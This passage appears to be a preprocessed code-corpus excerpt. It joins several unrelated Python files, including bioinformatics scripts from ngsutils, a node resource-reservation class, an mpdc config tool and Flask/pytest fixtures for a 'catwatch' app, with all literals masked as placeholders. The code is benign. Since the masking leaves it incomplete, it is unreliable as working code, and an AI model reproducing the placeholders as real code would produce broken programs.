iteritems ( ) : <EOL> node = dict ( ) <EOL> ports_usage [ node_k ] = dict ( ) <EOL> eligible_cores = list ( ) <EOL> for pair in node_v . processor . eligible_cores : <EOL> if isinstance ( pair , list ) : <EOL> for element in pair : <EOL> eligible_cores . append ( element ) <EOL> else : <EOL> eligible_cores . append ( pair ) <EOL> node [ '<STR_LIT>' ] = { '<STR_LIT>' : node_v . processor . cores , '<STR_LIT>' : eligible_cores } <EOL> node [ '<STR_LIT>' ] = { '<STR_LIT:size>' : str ( node_v . memory . node_size / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' , '<STR_LIT>' : str ( node_v . memory . eligible_memory / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' } <EOL> hugepage_size [ node_k ] = node_v . memory . hugepage_sz <EOL> ports = dict ( ) <EOL> for nic in node_v . nic_list : <EOL> for port in nic . ports . itervalues ( ) : <EOL> if port . enabled and not port . virtual : <EOL> ports [ port . name ] = { '<STR_LIT>' : str ( port . speed / <NUM_LIT> ) + '<STR_LIT>' } <EOL> ports_usage [ node_k ] [ port . name ] = <NUM_LIT:100> - int ( <NUM_LIT:100> * float ( port . available_bw ) / float ( port . speed ) ) <EOL> node [ '<STR_LIT>' ] = ports <EOL> nodes [ node_k ] = node <EOL> resp [ '<STR_LIT>' ] = nodes <EOL> cores = dict ( ) <EOL> memory = dict ( ) <EOL> for node_k in self . nodes . iterkeys ( ) : <EOL> if not node_k in cores : <EOL> cores [ node_k ] = list ( ) <EOL> memory [ node_k ] = <NUM_LIT:0> <EOL> for _ , reserved in self . reserved . iteritems ( ) : <EOL> if node_k in reserved . node_reserved_resources : <EOL> node_v = reserved . node_reserved_resources [ node_k ] <EOL> cores [ node_k ] . extend ( node_v . reserved_cores ) <EOL> memory [ node_k ] += node_v . reserved_hugepage_nr * hugepage_size [ node_k ] <EOL> occupation = dict ( ) <EOL> for node_k in self . nodes . iterkeys ( ) : <EOL> ports = dict ( ) <EOL> for name , usage in ports_usage [ node_k ] . 
iteritems ( ) : <EOL> ports [ name ] = { '<STR_LIT>' : str ( usage ) + '<STR_LIT:%>' } <EOL> occupation [ node_k ] = { '<STR_LIT>' : cores [ node_k ] , '<STR_LIT>' : str ( memory [ node_k ] / ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) + '<STR_LIT>' , '<STR_LIT>' : ports } <EOL> resp [ '<STR_LIT>' ] = occupation <EOL> return resp <EOL> class RADreservedResources ( ) : <EOL> def __init__ ( self ) : <EOL> self . node_reserved_resources = dict ( ) <EOL> self . mgmt_interface_pci = None <EOL> self . image = None <EOL> def update ( self , reserved ) : <EOL> self . image = reserved . image <EOL> self . mgmt_interface_pci = reserved . mgmt_interface_pci <EOL> for k , v in reserved . node_reserved_resources . iteritems ( ) : <EOL> if k in self . node_reserved_resources . keys ( ) : <EOL> return ( False , '<STR_LIT>' + str ( k ) + '<STR_LIT>' ) <EOL> self . node_reserved_resources [ k ] = v <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . image ) + '<STR_LIT:\n>' <EOL> for node_id , node_reserved in self . node_reserved_resources . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( node_id ) + '<STR_LIT:\n>' <EOL> text += node_reserved . to_text ( ) <EOL> return text <EOL> class NodeReservedResources ( ) : <EOL> def __init__ ( self ) : <EOL> self . reserved_cores = list ( ) <EOL> self . reserved_hugepage_nr = <NUM_LIT:0> <EOL> self . reserved_ports = dict ( ) <EOL> self . vlan_tags = dict ( ) <EOL> self . cpu_pinning = None <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . reserved_cores ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . cpu_pinning ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . reserved_hugepage_nr ) + '<STR_LIT:\n>' <EOL> for port_pci , port_description in self . reserved_ports . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( port_pci ) + '<STR_LIT:\n>' <EOL> text += port_description . to_text ( ) <EOL> return text </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from ngsutils . bam import bam_pileup_iter , bam_open <EOL> import pysam <EOL> class ExpressedRegion ( object ) : <EOL> _count = <NUM_LIT:0> <EOL> def __init__ ( self , chrom , only_uniq_starts = False ) : <EOL> ExpressedRegion . _count += <NUM_LIT:1> <EOL> self . name = '<STR_LIT>' % ExpressedRegion . _count <EOL> self . chrom = chrom <EOL> self . start = None <EOL> self . end = None <EOL> self . fwd_count = <NUM_LIT:0> <EOL> self . rev_count = <NUM_LIT:0> <EOL> self . reads = set ( ) <EOL> self . read_count = <NUM_LIT:0> <EOL> self . only_uniq_starts = only_uniq_starts <EOL> self . uniq_starts = set ( ) <EOL> def add_column ( self , read , pos ) : <EOL> if not self . start : <EOL> self . start = pos <EOL> if not self . end or pos >= self . end : <EOL> self . end = pos + <NUM_LIT:1> <EOL> if not read . alignment . qname in self . reads : <EOL> self . reads . add ( read . alignment . qname ) <EOL> self . read_count += <NUM_LIT:1> <EOL> if self . only_uniq_starts : <EOL> if not read . alignment . is_reverse : <EOL> if not read . alignment . pos in self . uniq_starts : <EOL> self . uniq_starts . add ( read . alignment . pos ) <EOL> self . fwd_count += <NUM_LIT:1> <EOL> else : <EOL> if not read . alignment . aend in self . uniq_starts : <EOL> self . uniq_starts . add ( read . alignment . aend ) <EOL> self . rev_count += <NUM_LIT:1> <EOL> else : <EOL> if read . alignment . is_reverse : <EOL> self . rev_count += <NUM_LIT:1> <EOL> else : <EOL> self . fwd_count += <NUM_LIT:1> <EOL> def write ( self , fs ) : <EOL> cols = [ ] <EOL> cols . append ( self . chrom ) <EOL> cols . append ( str ( self . start ) ) <EOL> cols . append ( str ( self . end ) ) <EOL> cols . append ( self . name ) <EOL> if self . only_uniq_starts : <EOL> cols . append ( str ( len ( self . uniq_starts ) ) ) <EOL> else : <EOL> cols . append ( str ( self . read_count ) ) <EOL> if self . fwd_count > self . rev_count : <EOL> cols . 
append ( '<STR_LIT:+>' ) <EOL> else : <EOL> cols . append ( '<STR_LIT:->' ) <EOL> fs . write ( '<STR_LIT:\t>' . join ( cols ) ) <EOL> fs . write ( '<STR_LIT:\n>' ) <EOL> def bam_find_regions ( bam_name , merge_distance = <NUM_LIT:10> , min_read_count = <NUM_LIT:2> , only_uniq_starts = False , nostrand = False , out = sys . stdout ) : <EOL> bamfile = bam_open ( bam_name ) <EOL> region_plus = None <EOL> region_minus = None <EOL> for pileup in bam_pileup_iter ( bamfile , mask = <NUM_LIT> ) : <EOL> chrom = bamfile . getrname ( pileup . tid ) <EOL> for read in pileup . pileups : <EOL> if read . is_del : <EOL> continue <EOL> if nostrand or not read . alignment . is_reverse : <EOL> if not region_plus or region_plus . chrom != chrom or ( region_plus . end + merge_distance ) < pileup . pos : <EOL> if region_plus and region_plus . read_count >= min_read_count : <EOL> region_plus . write ( out ) <EOL> region_plus = ExpressedRegion ( chrom , only_uniq_starts ) <EOL> region_plus . add_column ( read , pileup . pos ) <EOL> else : <EOL> if not region_minus or region_minus . chrom != chrom or ( region_minus . end + merge_distance ) < pileup . pos : <EOL> if region_minus and region_minus . read_count >= min_read_count : <EOL> region_minus . write ( out ) <EOL> region_minus = ExpressedRegion ( chrom , only_uniq_starts ) <EOL> region_minus . add_column ( read , pileup . pos ) <EOL> if region_plus and region_plus . read_count >= min_read_count : <EOL> region_plus . write ( out ) <EOL> if region_minus and region_minus . read_count >= min_read_count : <EOL> region_minus . write ( out ) <EOL> bamfile . close ( ) <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print """<STR_LIT>""" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> uniq = False <EOL> dist = <NUM_LIT:10> <EOL> mincount = <NUM_LIT:2> <EOL> fname = None <EOL> last = None <EOL> nostrand = False <EOL> for arg in sys . 
argv [ <NUM_LIT:1> : ] : <EOL> if last == '<STR_LIT>' : <EOL> dist = int ( arg ) <EOL> last = None <EOL> elif last == '<STR_LIT>' : <EOL> mincount = int ( arg ) <EOL> last = None <EOL> elif arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> elif arg == '<STR_LIT>' : <EOL> uniq = True <EOL> elif arg == '<STR_LIT>' : <EOL> nostrand = True <EOL> elif arg in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> last = arg <EOL> elif not fname and os . path . exists ( arg ) : <EOL> fname = arg <EOL> else : <EOL> print '<STR_LIT>' % arg <EOL> usage ( ) <EOL> if not fname : <EOL> usage ( ) <EOL> bam_find_regions ( fname , dist , mincount , uniq , nostrand ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import os <EOL> import ngsutils . bam <EOL> from ngsutils . bam . innerdist import bam_innerdist <EOL> from ngsutils . bam . t import MockBam , _matches <EOL> testbam1 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:100> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam1 . add_read ( '<STR_LIT>' , tid = - <NUM_LIT:1> ) <EOL> testbam2 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = - <NUM_LIT:1> ) <EOL> testbam2 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:100> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . 
add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam3 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 = MockBam ( [ '<STR_LIT>' ] , insert_order = True ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT:200> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> testbam4 . add_read ( '<STR_LIT>' , tid = <NUM_LIT:0> , pos = <NUM_LIT> , aend = <NUM_LIT> , cigar = '<STR_LIT>' ) <EOL> class InnerDistTest ( unittest . TestCase ) : <EOL> def testError ( self ) : <EOL> failed = False <EOL> try : <EOL> bam_innerdist ( testbam3 , testbam4 ) <EOL> except ValueError : <EOL> failed = True <EOL> self . assertTrue ( failed ) <EOL> def testDist ( self ) : <EOL> total , proper , mean , stdev , o_count = bam_innerdist ( testbam1 , testbam2 ) <EOL> self . assertEqual ( total , <NUM_LIT:6> ) <EOL> self . assertEqual ( proper , <NUM_LIT:4> ) <EOL> self . assertEqual ( mean , <NUM_LIT> ) <EOL> self . assertEqual ( round ( stdev , <NUM_LIT:5> ) , <NUM_LIT> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from ngsutils . bed import BedFile <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print """<STR_LIT>""" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def bed_size ( bed , out = sys . stdout ) : <EOL> for region in bed : <EOL> out . write ( '<STR_LIT>' % ( region . end - region . start ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> fname = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not fname and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> fname = arg <EOL> else : <EOL> print "<STR_LIT>" % arg <EOL> usage ( ) <EOL> if not fname : <EOL> usage ( ) <EOL> bed_size ( BedFile ( fname ) ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import sys <EOL> from ngsutils . fastq import FASTQ <EOL> import ngsutils . support <EOL> def fastq_revcomp ( fastq , out = sys . stdout , quiet = False ) : <EOL> if fastq . is_colorspace : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for read in fastq . fetch ( quiet = quiet ) : <EOL> seq = ngsutils . support . revcomp ( read . seq ) <EOL> qual = read . qual [ : : - <NUM_LIT:1> ] <EOL> read . clone ( seq = seq , qual = qual ) . write ( out ) <EOL> def usage ( ) : <EOL> print __doc__ <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> fname = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not fname and os . path . exists ( arg ) : <EOL> fname = arg <EOL> if not fname : <EOL> usage ( ) <EOL> fq = FASTQ ( fname ) <EOL> fastq_revcomp ( fq ) <EOL> fq . close ( ) </s>
<s> '''<STR_LIT>''' <EOL> import sys <EOL> import os <EOL> from ngsutils . support import gzip_reader <EOL> def gtf_add_isoform ( gtf , iso , out = sys . stdout , quiet = False ) : <EOL> isoforms = { } <EOL> if not quiet : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> for line in gzip_reader ( iso ) : <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> continue <EOL> cols = line . rstrip ( ) . split ( '<STR_LIT:\t>' ) <EOL> isoforms [ cols [ <NUM_LIT:1> ] ] = cols [ <NUM_LIT:0> ] <EOL> if not quiet : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> for line in gzip_reader ( gtf ) : <EOL> try : <EOL> comment = None <EOL> idx = line . find ( '<STR_LIT:#>' ) <EOL> if idx > - <NUM_LIT:1> : <EOL> if idx == <NUM_LIT:0> : <EOL> sys . stdout . write ( line ) <EOL> continue <EOL> comment = line [ idx : ] <EOL> line = line [ : - idx ] <EOL> chrom , source , feature , start , end , score , strand , frame , attrs = line . rstrip ( ) . split ( '<STR_LIT:\t>' ) <EOL> transcript_id = None <EOL> for key , val in [ x . split ( '<STR_LIT:U+0020>' ) for x in [ x . strip ( ) for x in attrs . split ( '<STR_LIT:;>' ) ] if x ] : <EOL> if val [ <NUM_LIT:0> ] == '<STR_LIT:">' and val [ - <NUM_LIT:1> ] == '<STR_LIT:">' : <EOL> val = val [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> if key == '<STR_LIT>' : <EOL> transcript_id = val <EOL> if attrs [ - <NUM_LIT:1> ] != '<STR_LIT:;>' : <EOL> attrs = '<STR_LIT>' % attrs <EOL> if transcript_id in isoforms : <EOL> attrs = '<STR_LIT>' % ( attrs , isoforms [ transcript_id ] ) <EOL> out . write ( '<STR_LIT:\t>' . join ( [ chrom , source , feature , start , end , score , strand , frame , attrs ] ) ) <EOL> if comment : <EOL> out . write ( '<STR_LIT>' % comment ) <EOL> out . write ( '<STR_LIT:\n>' ) <EOL> except : <EOL> import traceback <EOL> sys . stderr . write ( '<STR_LIT>' % line ) <EOL> traceback . print_exc ( ) <EOL> sys . 
exit ( <NUM_LIT:1> ) <EOL> def usage ( msg = None ) : <EOL> if msg : <EOL> print msg <EOL> print __doc__ <EOL> print '<STR_LIT>' <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> gtf = None <EOL> iso = None <EOL> for arg in sys . argv [ <NUM_LIT:1> : ] : <EOL> if arg == '<STR_LIT>' : <EOL> usage ( ) <EOL> if not gtf and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> gtf = arg <EOL> elif not iso and ( os . path . exists ( arg ) or arg == '<STR_LIT:->' ) : <EOL> iso = arg <EOL> if not gtf or not iso : <EOL> usage ( ) <EOL> if gtf == '<STR_LIT:->' and iso == '<STR_LIT:->' : <EOL> usage ( '<STR_LIT>' ) <EOL> gtf_add_isoform ( gtf , iso ) </s>
<s> class RangeMatch ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , name ) : <EOL> self . ranges = { } <EOL> self . name = name <EOL> def add_range ( self , chrom , strand , start , end ) : <EOL> if not chrom in self . ranges : <EOL> self . ranges [ chrom ] = { } <EOL> bin = start / <NUM_LIT> <EOL> if not bin in self . ranges [ chrom ] : <EOL> self . ranges [ chrom ] [ bin ] = [ ] <EOL> self . ranges [ chrom ] [ bin ] . insert ( <NUM_LIT:0> , ( start , end , strand ) ) <EOL> if ( end / <NUM_LIT> ) != bin : <EOL> for bin in xrange ( bin + <NUM_LIT:1> , ( end / <NUM_LIT> ) + <NUM_LIT:1> ) : <EOL> if not bin in self . ranges [ chrom ] : <EOL> self . ranges [ chrom ] [ bin ] = [ ] <EOL> self . ranges [ chrom ] [ bin ] . insert ( <NUM_LIT:0> , ( start , end , strand ) ) <EOL> def get_tag ( self , chrom , strand , pos , ignore_strand = False ) : <EOL> '''<STR_LIT>''' <EOL> if not chrom in self . ranges : <EOL> return None , False <EOL> bin = pos / <NUM_LIT> <EOL> if not bin in self . ranges [ chrom ] : <EOL> return None , False <EOL> for start , end , r_strand in self . ranges [ chrom ] [ bin ] : <EOL> if pos >= start and pos <= end : <EOL> if ignore_strand or strand == r_strand : <EOL> return self . name , False <EOL> return self . name , True <EOL> return None , False <EOL> class RegionTagger ( object ) : <EOL> def __init__ ( self , gtf , valid_chroms = None , only_first_fragment = True ) : <EOL> self . regions = [ ] <EOL> self . counts = { } <EOL> self . only_first_fragment = only_first_fragment <EOL> coding = RangeMatch ( '<STR_LIT>' ) <EOL> exons = RangeMatch ( '<STR_LIT>' ) <EOL> utr_5 = RangeMatch ( '<STR_LIT>' ) <EOL> utr_3 = RangeMatch ( '<STR_LIT>' ) <EOL> introns = RangeMatch ( '<STR_LIT>' ) <EOL> promoters = RangeMatch ( '<STR_LIT>' ) <EOL> for gene in gtf . genes : <EOL> if valid_chroms and not gene . chrom in valid_chroms : <EOL> continue <EOL> if gene . strand == '<STR_LIT:+>' : <EOL> promoters . add_range ( gene . chrom , gene . 
strand , gene . start - <NUM_LIT> , gene . start ) <EOL> else : <EOL> promoters . add_range ( gene . chrom , gene . strand , gene . end , gene . end + <NUM_LIT> ) <EOL> for transcript in gene . transcripts : <EOL> if transcript . has_cds : <EOL> for start , end in transcript . cds : <EOL> coding . add_range ( gene . chrom , gene . strand , start , end ) <EOL> for s , e in transcript . utr_5 : <EOL> utr_5 . add_range ( gene . chrom , gene . strand , s , e ) <EOL> for s , e in transcript . utr_3 : <EOL> utr_3 . add_range ( gene . chrom , gene . strand , s , e ) <EOL> last_end = None <EOL> for start , end in transcript . exons : <EOL> if last_end : <EOL> introns . add_range ( gene . chrom , gene . strand , last_end , start ) <EOL> exons . add_range ( gene . chrom , gene . strand , start , end ) <EOL> last_end = end <EOL> self . regions . append ( coding ) <EOL> self . regions . append ( utr_5 ) <EOL> self . regions . append ( utr_3 ) <EOL> self . regions . append ( exons ) <EOL> self . regions . append ( introns ) <EOL> self . regions . append ( promoters ) <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . counts [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def add_read ( self , read , chrom ) : <EOL> if read . is_unmapped : <EOL> return <EOL> if self . only_first_fragment and read . is_paired and not read . 
is_read1 : <EOL> return <EOL> tag = None <EOL> is_rev = False <EOL> strand = '<STR_LIT:->' if read . is_reverse else '<STR_LIT:+>' <EOL> if chrom == '<STR_LIT>' : <EOL> tag = '<STR_LIT>' <EOL> if not tag : <EOL> for op , length in read . cigar : <EOL> if op == <NUM_LIT:3> : <EOL> tag = '<STR_LIT>' <EOL> break <EOL> if not tag : <EOL> for region in self . regions : <EOL> tag , is_rev = region . get_tag ( chrom , strand , read . pos ) <EOL> if tag : <EOL> break <EOL> if not tag : <EOL> tag = '<STR_LIT>' <EOL> if tag : <EOL> if is_rev : <EOL> self . counts [ '<STR_LIT>' % tag ] += <NUM_LIT:1> <EOL> else : <EOL> self . counts [ tag ] += <NUM_LIT:1> <EOL> return tag <EOL> def tag_region ( self , chrom , start , end , strand ) : <EOL> tag = None <EOL> is_rev = False <EOL> if chrom == '<STR_LIT>' or chrom == '<STR_LIT:M>' : <EOL> tag = '<STR_LIT>' <EOL> if not tag : <EOL> for region in self . regions : <EOL> tag , is_rev = region . get_tag ( chrom , strand , start ) <EOL> if is_rev : <EOL> tag = '<STR_LIT>' % tag <EOL> if start != end : <EOL> endtag , is_rev = region . get_tag ( chrom , strand , end ) <EOL> if is_rev : <EOL> endtag = '<STR_LIT>' % endtag <EOL> if tag and endtag and endtag != tag : <EOL> tag = '<STR_LIT>' % ( tag , endtag ) <EOL> if not tag : <EOL> tag = '<STR_LIT>' </s>
<s> import os <EOL> import argparse <EOL> from configparser import ConfigParser <EOL> from mpdc . libs . utils import info , warning <EOL> def configure ( args ) : <EOL> if args . switch : <EOL> change_default_profile ( args . switch ) <EOL> return <EOL> config = ConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT:localhost>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = input ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> print ( '<STR_LIT:\n>' ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> while True : <EOL> path = input ( '<STR_LIT>' ) <EOL> if os . path . isfile ( path ) : <EOL> break <EOL> warning ( '<STR_LIT>' + path ) <EOL> print ( '<STR_LIT:\n>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = path <EOL> colors = input ( '<STR_LIT>' ) . lower ( ) or '<STR_LIT:y>' <EOL> if colors == '<STR_LIT:y>' : <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> print ( '<STR_LIT:\n>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> filepath = os . path . expanduser ( '<STR_LIT>' ) <EOL> try : <EOL> with open ( filepath , '<STR_LIT:w>' ) as configfile : <EOL> config . write ( configfile ) <EOL> info ( '<STR_LIT>' + filepath ) <EOL> except IOError : <EOL> warning ( '<STR_LIT>' + filepath ) <EOL> def change_default_profile ( profile ) : <EOL> config = ConfigParser ( ) <EOL> filepath = os . path . expanduser ( '<STR_LIT>' ) <EOL> if not config . read ( filepath ) : <EOL> warning ( '<STR_LIT>' ) <EOL> return <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] = str ( profile ) <EOL> try : <EOL> with open ( filepath , '<STR_LIT:w>' ) as configfile : <EOL> config . 
write ( configfile ) <EOL> info ( '<STR_LIT>' + filepath ) <EOL> except IOError : <EOL> warning ( '<STR_LIT>' + filepath ) <EOL> def main ( ) : <EOL> argparser = argparse . ArgumentParser ( add_help = False ) <EOL> argparser . set_defaults ( func = configure ) <EOL> argparser . add_argument ( '<STR_LIT>' , type = int , action = '<STR_LIT:store>' ) <EOL> args = argparser . parse_args ( ) <EOL> args . func ( args ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import catwatch . lib . logger </s>
<s> from catwatch . app import create_celery_app <EOL> celery = create_celery_app ( ) <EOL> @ celery . task ( rate_limit = '<STR_LIT>' ) <EOL> def broadcast_message ( internal_url , data ) : <EOL> """<STR_LIT>""" <EOL> from catwatch . blueprints . stream . broadcast import Broadcast <EOL> Broadcast . send_to_websocket_server ( internal_url , data ) </s>
<s> import datetime <EOL> import pytest <EOL> import pytz <EOL> from mock import Mock <EOL> from config import settings <EOL> from catwatch . app import create_app <EOL> from catwatch . lib . util_datetime import timedelta_months <EOL> from catwatch . extensions import db as _db <EOL> from catwatch . blueprints . user . models import User <EOL> from catwatch . blueprints . issue . models import Issue <EOL> from catwatch . blueprints . billing . models . credit_card import CreditCard <EOL> from catwatch . blueprints . billing . models . coupon import Coupon <EOL> from catwatch . blueprints . billing . models . subscription import Subscription <EOL> from catwatch . blueprints . billing . gateways . stripecom import Coupon as PaymentCoupon <EOL> from catwatch . blueprints . billing . gateways . stripecom import Event as PaymentEvent <EOL> from catwatch . blueprints . billing . gateways . stripecom import Card as PaymentCard <EOL> from catwatch . blueprints . billing . gateways . stripecom import Subscription as PaymentSubscription <EOL> from catwatch . blueprints . billing . gateways . stripecom import Invoice as PaymentInvoice <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def app ( ) : <EOL> """<STR_LIT>""" <EOL> db_uri = '<STR_LIT>' . format ( settings . SQLALCHEMY_DATABASE_URI ) <EOL> params = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : db_uri <EOL> } <EOL> _app = create_app ( settings_override = params ) <EOL> ctx = _app . app_context ( ) <EOL> ctx . push ( ) <EOL> yield _app <EOL> ctx . pop ( ) <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def client ( app ) : <EOL> """<STR_LIT>""" <EOL> yield app . test_client ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def db ( app ) : <EOL> """<STR_LIT>""" <EOL> _db . drop_all ( ) <EOL> _db . 
create_all ( ) <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' <EOL> } <EOL> admin = User ( ** params ) <EOL> _db . session . add ( admin ) <EOL> _db . session . commit ( ) <EOL> return _db <EOL> @ pytest . yield_fixture ( scope = '<STR_LIT>' ) <EOL> def session ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . begin_nested ( ) <EOL> yield db . session <EOL> db . session . rollback ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def token ( db ) : <EOL> """<STR_LIT>""" <EOL> user = User . find_by_identity ( '<STR_LIT>' ) <EOL> return user . serialize_token ( ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def users ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( User ) . delete ( ) <EOL> users = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : 